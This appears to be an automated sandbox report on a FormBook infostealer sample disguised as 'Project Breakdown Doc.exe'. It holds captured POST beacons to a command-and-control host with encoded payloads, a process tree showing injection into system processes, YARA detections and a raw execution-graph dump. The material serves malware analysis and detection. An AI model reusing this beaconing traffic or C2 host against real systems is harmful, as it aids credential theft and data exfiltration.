                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 200
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.wine-drinkers.club
                                                Referer: http://www.wine-drinkers.club/hakt/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Raw: 41 46 46 3d 55 31 38 35 2b 65 78 39 49 6a 39 41 58 51 65 43 6a 4c 75 6c 52 78 51 54 4c 74 67 6d 35 64 52 52 46 6c 5a 2b 33 47 4e 68 69 2b 44 57 67 61 47 55 45 38 6f 66 42 6c 45 79 78 33 75 37 77 4e 67 32 6d 62 6e 38 6e 37 5a 34 78 4c 4c 36 50 49 6e 30 51 6a 48 65 44 2f 70 66 4c 34 79 30 54 2f 67 77 74 79 4c 69 36 7a 5a 69 63 43 6f 4b 45 7a 67 46 57 6c 4e 6f 75 68 36 4d 6b 69 66 79 66 74 57 75 34 32 47 57 6d 61 41 68 52 6a 7a 37 55 6a 38 66 2f 68 62 38 58 51 54 57 46 79 52 48 31 4a 58 58 43 74 54 54 5a 5a 41 57 4d 35 66 74 66 7a 76 61 6f 75 61 75 47 57 6d 49 2f 75 69 7a 55 4b 4e 55 41 41 3d 3d
                                                Data Ascii: AFF=U185+ex9Ij9AXQeCjLulRxQTLtgm5dRRFlZ+3GNhi+DWgaGUE8ofBlEyx3u7wNg2mbn8n7Z4xLL6PIn0QjHeD/pfL4y0T/gwtyLi6zZicCoKEzgFWlNouh6MkifyftWu42GWmaAhRjz7Uj8f/hb8XQTWFyRH1JXXCtTTZZAWM5ftfzvaouauGWmI/uizUKNUAA==
                                                Nov 22, 2024 12:43:01.931945086 CET | 725 | IN | HTTP/1.1 403 Forbidden
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:43:01 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                10 | 192.168.2.4 | 49888 | 194.245.148.189 | 80 | 4548 | C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 22, 2024 12:43:03.552467108 CET | 745 | OUT | POST /hakt/ HTTP/1.1
                                                Host: www.wine-drinkers.club
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 220
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.wine-drinkers.club
                                                Referer: http://www.wine-drinkers.club/hakt/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Raw: 41 46 46 3d 55 31 38 35 2b 65 78 39 49 6a 39 41 57 77 75 43 76 4d 43 6c 58 52 51 51 46 4e 67 6d 69 4e 52 4e 46 6c 46 2b 33 48 5a 50 6a 4d 58 57 68 2f 36 55 46 39 6f 66 45 6c 45 79 37 58 75 36 36 74 67 35 6d 61 62 65 6e 36 6c 34 78 4c 50 36 50 4d 6a 30 51 51 2b 73 43 76 70 5a 44 59 79 32 51 50 67 77 74 79 4c 69 36 31 31 62 63 43 67 4b 46 44 77 46 55 41 68 72 74 68 36 4c 6a 69 66 79 56 39 57 71 34 32 48 37 6d 65 59 4c 52 67 4c 37 55 68 30 66 78 55 6e 7a 65 51 54 51 4c 53 51 34 39 5a 4f 53 61 64 65 75 64 62 73 73 4c 64 4c 37 65 31 69 41 35 66 37 35 55 57 43 37 69 70 72 48 5a 4a 77 64 62 4e 65 67 30 75 73 58 72 44 6a 61 72 76 6f 4e 43 4b 79 58 53 77 51 3d
                                                Data Ascii: AFF=U185+ex9Ij9AWwuCvMClXRQQFNgmiNRNFlF+3HZPjMXWh/6UF9ofElEy7Xu66tg5maben6l4xLP6PMj0QQ+sCvpZDYy2QPgwtyLi611bcCgKFDwFUAhrth6LjifyV9Wq42H7meYLRgL7Uh0fxUnzeQTQLSQ49ZOSadeudbssLdL7e1iA5f75UWC7iprHZJwdbNeg0usXrDjarvoNCKyXSwQ=
                                                Nov 22, 2024 12:43:04.796037912 CET | 725 | IN | HTTP/1.1 403 Forbidden
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:43:04 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                Session ID: 11
                                                Source IP: 192.168.2.4
                                                Source Port: 49899
                                                Destination IP: 194.245.148.189
                                                Destination Port: 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 22, 2024 12:43:06.668729067 CET | 10827 | OUT | POST /hakt/ HTTP/1.1
                                                Host: www.wine-drinkers.club
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 10300
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.wine-drinkers.club
                                                Referer: http://www.wine-drinkers.club/hakt/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Nov 22, 2024 12:43:08.086833000 CET | 725 | IN | HTTP/1.1 403 Forbidden
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:43:07 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                Target ID:0
                                                Start time:06:40:58
                                                Start date:22/11/2024
                                                Path:C:\Users\user\Desktop\Project Breakdown Doc.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Project Breakdown Doc.exe"
                                                Imagebase:0xc40000
                                                File size:1'368'576 bytes
                                                MD5 hash:BF7D24A56C64E6632FF2CA51F08908F8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:1
                                                Start time:06:40:59
                                                Start date:22/11/2024
                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Project Breakdown Doc.exe"
                                                Imagebase:0xd90000
                                                File size:46'504 bytes
                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2259560056.0000000003960000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2259200561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2260126536.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:06:41:48
                                                Start date:22/11/2024
                                                Path:C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe"
                                                Imagebase:0x60000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2936946828.0000000003450000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:6
                                                Start time:06:41:50
                                                Start date:22/11/2024
                                                Path:C:\Windows\SysWOW64\powercfg.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\powercfg.exe"
                                                Imagebase:0xe90000
                                                File size:78'336 bytes
                                                MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2936457400.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2936746920.0000000003470000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2935024128.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:7
                                                Start time:06:42:04
                                                Start date:22/11/2024
                                                Path:C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe"
                                                Imagebase:0x60000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2938680835.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:8
                                                Start time:06:42:17
                                                Start date:22/11/2024
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff6bf500000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                  Execution Graph

                                                  Execution Coverage:3.4%
                                                  Dynamic/Decrypted Code Coverage:0.9%
                                                  Signature Coverage:7.5%
                                                  Total number of Nodes:1988
                                                  Total number of Limit Nodes:170
DestroyWindow GetMessageW 98657->98650 98660 c5108a 98657->98660 98659 c852ab Sleep 98659->98688 98663 c86082 TranslateMessage DispatchMessageW GetMessageW 98660->98663 98661 c50e44 98661->98650 99828 c511d0 10 API calls Mailbox 98661->99828 98662->98688 99832 c49fbd 60 API calls 98662->99832 99833 c968bf 341 API calls 98662->99833 98663->98663 98665 c860b2 98663->98665 98665->98650 98666 c8517a TranslateAcceleratorW 98667 c50fa3 PeekMessageW 98666->98667 98666->98688 98667->98688 98668 c50fbf TranslateMessage DispatchMessageW 98668->98667 98669 c60ff6 59 API calls Mailbox 98669->98688 98670 c50e73 timeGetTime 98670->98688 98671 c85c49 WaitForSingleObject 98673 c85c66 GetExitCodeProcess CloseHandle 98671->98673 98671->98688 98710 c510f5 98673->98710 98674 c50fdd Sleep 98703 c50fee Mailbox 98674->98703 98675 c481a7 59 API calls 98675->98688 98676 c477c7 59 API calls 98676->98703 98677 c85f22 Sleep 98677->98703 98679 c4b89c 314 API calls 98679->98688 98681 c60719 timeGetTime 98681->98703 98682 c510ae timeGetTime 99830 c49fbd 60 API calls 98682->99830 98685 c49997 84 API calls 98685->98688 98686 c85fb9 GetExitCodeProcess 98692 c85fcf WaitForSingleObject 98686->98692 98693 c85fe5 CloseHandle 98686->98693 98688->98655 98688->98659 98688->98661 98688->98666 98688->98667 98688->98668 98688->98669 98688->98670 98688->98671 98688->98674 98688->98675 98688->98677 98688->98679 98688->98682 98688->98685 98701 c49fbd 60 API calls 98688->98701 98688->98703 98705 c4a000 314 API calls 98688->98705 98709 c47f41 59 API calls 98688->98709 98688->98710 98712 caa0b5 89 API calls 98688->98712 98714 c48620 69 API calls 98688->98714 98715 c49df0 59 API calls Mailbox 98688->98715 98717 c966f4 59 API calls Mailbox 98688->98717 98718 c48b13 69 API calls 98688->98718 98719 c859ff VariantClear 98688->98719 98720 c85a95 VariantClear 98688->98720 98721 c48e34 59 API calls Mailbox 98688->98721 98722 c85843 VariantClear 98688->98722 98723 c97405 59 API calls 98688->98723 99774 c4e800 98688->99774 
99807 c4f5c0 98688->99807 99825 c4e580 341 API calls 98688->99825 99826 c4fe40 341 API calls 2 library calls 98688->99826 99827 c431ce IsDialogMessageW GetClassLongW 98688->99827 99834 cc629f 59 API calls 98688->99834 99835 ca9c9f 59 API calls Mailbox 98688->99835 99836 c9d9e3 59 API calls 98688->99836 99837 c96665 59 API calls 2 library calls 98688->99837 99838 c48561 59 API calls 98688->99838 99839 c4843f 59 API calls Mailbox 98688->99839 98690 cc61ac 110 API calls 98690->98703 98691 c4b93d 109 API calls 98691->98703 98692->98688 98692->98693 98693->98703 98694 c85c9e 98694->98710 98695 c86041 Sleep 98695->98688 98696 c854a2 Sleep 98696->98688 98698 c47f41 59 API calls 98698->98703 98701->98688 98703->98676 98703->98681 98703->98686 98703->98688 98703->98690 98703->98691 98703->98694 98703->98695 98703->98696 98703->98698 98703->98710 99840 ca28f7 60 API calls 98703->99840 99841 c49fbd 60 API calls 98703->99841 99842 c48b13 69 API calls Mailbox 98703->99842 99843 c4b89c 341 API calls 98703->99843 99844 c96a50 60 API calls 98703->99844 99845 ca54e6 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98703->99845 99846 ca3e91 66 API calls Mailbox 98703->99846 98705->98688 98709->98688 98710->98497 98712->98688 98714->98688 98715->98688 98717->98688 98718->98688 98719->98688 98720->98688 98721->98688 98722->98688 98723->98688 98724->98500 98725->98474 98726->98486 98728 c71b90 __ftell_nolock 98727->98728 98729 c44871 GetModuleFileNameW 98728->98729 98730 c47f41 59 API calls 98729->98730 98731 c44897 98730->98731 98732 c448ae 60 API calls 98731->98732 98733 c448a1 Mailbox 98732->98733 98733->98493 98735 c7f173 98734->98735 98736 c47e1f 98734->98736 98738 c48189 59 API calls 98735->98738 100228 c47db0 98736->100228 98740 c7f17e __wsetenvp _memmove 98738->98740 98739 c47e2a 98739->98508 98742 c43d50 __ftell_nolock 98741->98742 98743 c43eb6 Mailbox 98742->98743 98744 c47d2c 59 API calls 98742->98744 98743->98519 98746 c43d82 
98744->98746 98754 c43db8 Mailbox 98746->98754 98863 c47b52 98746->98863 98747 c47b52 59 API calls 98747->98754 98748 c43e89 98748->98743 98749 c47f41 59 API calls 98748->98749 98751 c43eaa 98749->98751 98750 c47f41 59 API calls 98750->98754 98752 c43f84 59 API calls 98751->98752 98752->98743 98754->98743 98754->98747 98754->98748 98754->98750 98866 c43f84 98754->98866 98872 c44d13 98755->98872 98760 c7dd0f 98762 c44faa 84 API calls 98760->98762 98761 c44f68 LoadLibraryExW 98882 c44cc8 98761->98882 98764 c7dd16 98762->98764 98766 c44cc8 3 API calls 98764->98766 98769 c7dd1e 98766->98769 98768 c44f8f 98768->98769 98770 c44f9b 98768->98770 98908 c4506b 98769->98908 98772 c44faa 84 API calls 98770->98772 98773 c437e6 98772->98773 98773->98526 98773->98527 98776 c7dd45 98914 c45027 98776->98914 98778 c7dd52 98780 c60ff6 Mailbox 59 API calls 98779->98780 98781 c4380d 98780->98781 98781->98540 98784 c4862b 98782->98784 98783 c48652 98783->98544 98784->98783 99163 c48b13 69 API calls Mailbox 98784->99163 98787 c43f05 98786->98787 98788 c43eec 98786->98788 98790 c47d2c 59 API calls 98787->98790 98789 c481a7 59 API calls 98788->98789 98791 c4388b 98789->98791 98790->98791 98792 c6313d 98791->98792 98793 c631be 98792->98793 98794 c63149 98792->98794 99166 c631d0 60 API calls 3 library calls 98793->99166 98798 c6316e 98794->98798 99164 c68d68 58 API calls __getptd_noexit 98794->99164 98797 c631cb 98797->98565 98798->98565 98799 c63155 99165 c68ff6 9 API calls __read 98799->99165 98801 c63160 98801->98565 98803 c49436 98802->98803 98804 c60ff6 Mailbox 59 API calls 98803->98804 98806 c49444 98804->98806 98805 c43936 98808 c491b0 98805->98808 98806->98805 99167 c4935c 59 API calls Mailbox 98806->99167 99168 c492c0 98808->99168 98810 c491bf 98811 c60ff6 Mailbox 59 API calls 98810->98811 98812 c43944 98810->98812 98811->98812 98813 c49040 98812->98813 98814 c7f5a5 98813->98814 98816 c49057 98813->98816 98814->98816 99178 c48d3b 59 API calls Mailbox 98814->99178 98817 c491a0 
98816->98817 98818 c49158 98816->98818 98821 c4915f 98816->98821 99177 c49e9c 60 API calls Mailbox 98817->99177 98820 c60ff6 Mailbox 59 API calls 98818->98820 98820->98821 98821->98593 98823 c45045 85 API calls 98822->98823 98824 ca9854 98823->98824 99179 ca99be 96 API calls 2 library calls 98824->99179 98826 ca9866 98827 c4506b 74 API calls 98826->98827 98854 c7d3c1 98826->98854 98828 ca9881 98827->98828 98829 c4506b 74 API calls 98828->98829 98830 ca9891 98829->98830 98831 c4506b 74 API calls 98830->98831 98832 ca98ac 98831->98832 98833 c4506b 74 API calls 98832->98833 98834 ca98c7 98833->98834 98835 c45045 85 API calls 98834->98835 98836 ca98de 98835->98836 98837 c6594c _W_store_winword 58 API calls 98836->98837 98838 ca98e5 98837->98838 98839 c6594c _W_store_winword 58 API calls 98838->98839 98840 ca98ef 98839->98840 98841 c4506b 74 API calls 98840->98841 98842 ca9903 98841->98842 99180 ca9393 GetSystemTimeAsFileTime 98842->99180 98844 ca9916 98845 ca992b 98844->98845 98846 ca9940 98844->98846 98849 c62f95 _free 58 API calls 98845->98849 98847 ca9946 98846->98847 98848 ca99a5 98846->98848 99181 ca8d90 116 API calls __fcloseall 98847->99181 98851 c62f95 _free 58 API calls 98848->98851 98852 ca9931 98849->98852 98851->98854 98855 c62f95 _free 58 API calls 98852->98855 98853 ca999d 98856 c62f95 _free 58 API calls 98853->98856 98854->98531 98857 c44faa 98854->98857 98855->98854 98856->98854 98858 c44fb4 98857->98858 98859 c44fbb 98857->98859 99182 c655d6 98858->99182 98861 c44fca 98859->98861 98862 c44fdb FreeLibrary 98859->98862 98861->98531 98862->98861 98864 c47faf 59 API calls 98863->98864 98865 c47b5d 98864->98865 98865->98746 98867 c43f92 98866->98867 98871 c43fb4 _memmove 98866->98871 98869 c60ff6 Mailbox 59 API calls 98867->98869 98868 c60ff6 Mailbox 59 API calls 98870 c43fc8 98868->98870 98869->98871 98870->98754 98871->98868 98919 c44d61 98872->98919 98875 c44d3a 98876 c44d53 98875->98876 98877 c44d4a FreeLibrary 98875->98877 98879 c6548b 98876->98879 
98877->98876 98878 c44d61 2 API calls 98878->98875 98923 c654a0 98879->98923 98881 c44f5c 98881->98760 98881->98761 99083 c44d94 98882->99083 98885 c44ced 98886 c44cff FreeLibrary 98885->98886 98887 c44d08 98885->98887 98886->98887 98889 c44dd0 98887->98889 98888 c44d94 2 API calls 98888->98885 98890 c60ff6 Mailbox 59 API calls 98889->98890 98891 c44de5 98890->98891 99087 c4538e 98891->99087 98893 c44df1 _memmove 98894 c44e2c 98893->98894 98895 c44f21 98893->98895 98896 c44ee9 98893->98896 98897 c45027 69 API calls 98894->98897 99101 ca9ba5 95 API calls 98895->99101 99090 c44fe9 CreateStreamOnHGlobal 98896->99090 98905 c44e35 98897->98905 98900 c4506b 74 API calls 98900->98905 98901 c44ec9 98901->98768 98903 c7dcd0 98904 c45045 85 API calls 98903->98904 98906 c7dce4 98904->98906 98905->98900 98905->98901 98905->98903 99096 c45045 98905->99096 98907 c4506b 74 API calls 98906->98907 98907->98901 98909 c7ddf6 98908->98909 98910 c4507d 98908->98910 99125 c65812 98910->99125 98913 ca9393 GetSystemTimeAsFileTime 98913->98776 98915 c45036 98914->98915 98916 c7ddb9 98914->98916 99145 c65e90 98915->99145 98918 c4503e 98918->98778 98920 c44d2e 98919->98920 98921 c44d6a LoadLibraryA 98919->98921 98920->98875 98920->98878 98921->98920 98922 c44d7b GetProcAddress 98921->98922 98922->98920 98926 c654ac __read 98923->98926 98924 c654bf 98972 c68d68 58 API calls __getptd_noexit 98924->98972 98926->98924 98927 c654f0 98926->98927 98942 c70738 98927->98942 98928 c654c4 98973 c68ff6 9 API calls __read 98928->98973 98931 c654f5 98932 c654fe 98931->98932 98933 c6550b 98931->98933 98974 c68d68 58 API calls __getptd_noexit 98932->98974 98935 c65535 98933->98935 98936 c65515 98933->98936 98957 c70857 98935->98957 98975 c68d68 58 API calls __getptd_noexit 98936->98975 98939 c654cf @_EH4_CallFilterFunc@8 __read 98939->98881 98943 c70744 __read 98942->98943 98944 c69e4b __lock 58 API calls 98943->98944 98955 c70752 98944->98955 98945 c707c6 98977 c7084e 98945->98977 98946 c707cd 98982 c68a5d 
58 API calls 2 library calls 98946->98982 98949 c70843 __read 98949->98931 98950 c707d4 98950->98945 98983 c6a06b InitializeCriticalSectionAndSpinCount 98950->98983 98953 c69ed3 __mtinitlocknum 58 API calls 98953->98955 98954 c707fa EnterCriticalSection 98954->98945 98955->98945 98955->98946 98955->98953 98980 c66e8d 59 API calls __lock 98955->98980 98981 c66ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98955->98981 98966 c70877 __wopenfile 98957->98966 98958 c70891 98988 c68d68 58 API calls __getptd_noexit 98958->98988 98959 c70a4c 98959->98958 98963 c70aaf 98959->98963 98961 c70896 98989 c68ff6 9 API calls __read 98961->98989 98985 c787f1 98963->98985 98964 c65540 98976 c65562 LeaveCriticalSection LeaveCriticalSection _fseek 98964->98976 98966->98958 98966->98959 98990 c63a0b 60 API calls 2 library calls 98966->98990 98968 c70a45 98968->98959 98991 c63a0b 60 API calls 2 library calls 98968->98991 98970 c70a64 98970->98959 98992 c63a0b 60 API calls 2 library calls 98970->98992 98972->98928 98973->98939 98974->98939 98975->98939 98976->98939 98984 c69fb5 LeaveCriticalSection 98977->98984 98979 c70855 98979->98949 98980->98955 98981->98955 98982->98950 98983->98954 98984->98979 98993 c77fd5 98985->98993 98987 c7880a 98987->98964 98988->98961 98989->98964 98990->98968 98991->98970 98992->98959 98996 c77fe1 __read 98993->98996 98994 c77ff7 99080 c68d68 58 API calls __getptd_noexit 98994->99080 98996->98994 98998 c7802d 98996->98998 98997 c77ffc 99081 c68ff6 9 API calls __read 98997->99081 99004 c7809e 98998->99004 99001 c78049 99082 c78072 LeaveCriticalSection __unlock_fhandle 99001->99082 99003 c78006 __read 99003->98987 99005 c780be 99004->99005 99006 c6471a __wsopen_nolock 58 API calls 99005->99006 99010 c780da 99006->99010 99007 c78211 99008 c69006 __invoke_watson 8 API calls 99007->99008 99009 c787f0 99008->99009 99012 c77fd5 __wsopen_helper 103 API calls 99009->99012 99010->99007 99011 c78114 99010->99011 99018 c78137 99010->99018 99014 c68d34 __read 58 
API calls 99011->99014 99013 c7880a 99012->99013 99013->99001 99015 c78119 99014->99015 99016 c68d68 __read 58 API calls 99015->99016 99017 c78126 99016->99017 99020 c68ff6 __read 9 API calls 99017->99020 99019 c781f5 99018->99019 99027 c781d3 99018->99027 99021 c68d34 __read 58 API calls 99019->99021 99022 c78130 99020->99022 99023 c781fa 99021->99023 99022->99001 99024 c68d68 __read 58 API calls 99023->99024 99025 c78207 99024->99025 99026 c68ff6 __read 9 API calls 99025->99026 99026->99007 99028 c6d4d4 __alloc_osfhnd 61 API calls 99027->99028 99029 c782a1 99028->99029 99030 c782ce 99029->99030 99031 c782ab 99029->99031 99032 c77f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99030->99032 99033 c68d34 __read 58 API calls 99031->99033 99042 c782f0 99032->99042 99034 c782b0 99033->99034 99036 c68d68 __read 58 API calls 99034->99036 99035 c7836e GetFileType 99037 c783bb 99035->99037 99038 c78379 GetLastError 99035->99038 99040 c782ba 99036->99040 99050 c6d76a __set_osfhnd 59 API calls 99037->99050 99041 c68d47 __dosmaperr 58 API calls 99038->99041 99039 c7833c GetLastError 99043 c68d47 __dosmaperr 58 API calls 99039->99043 99044 c68d68 __read 58 API calls 99040->99044 99045 c783a0 CloseHandle 99041->99045 99042->99035 99042->99039 99046 c77f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99042->99046 99047 c78361 99043->99047 99044->99022 99045->99047 99048 c783ae 99045->99048 99049 c78331 99046->99049 99052 c68d68 __read 58 API calls 99047->99052 99051 c68d68 __read 58 API calls 99048->99051 99049->99035 99049->99039 99054 c783d9 99050->99054 99053 c783b3 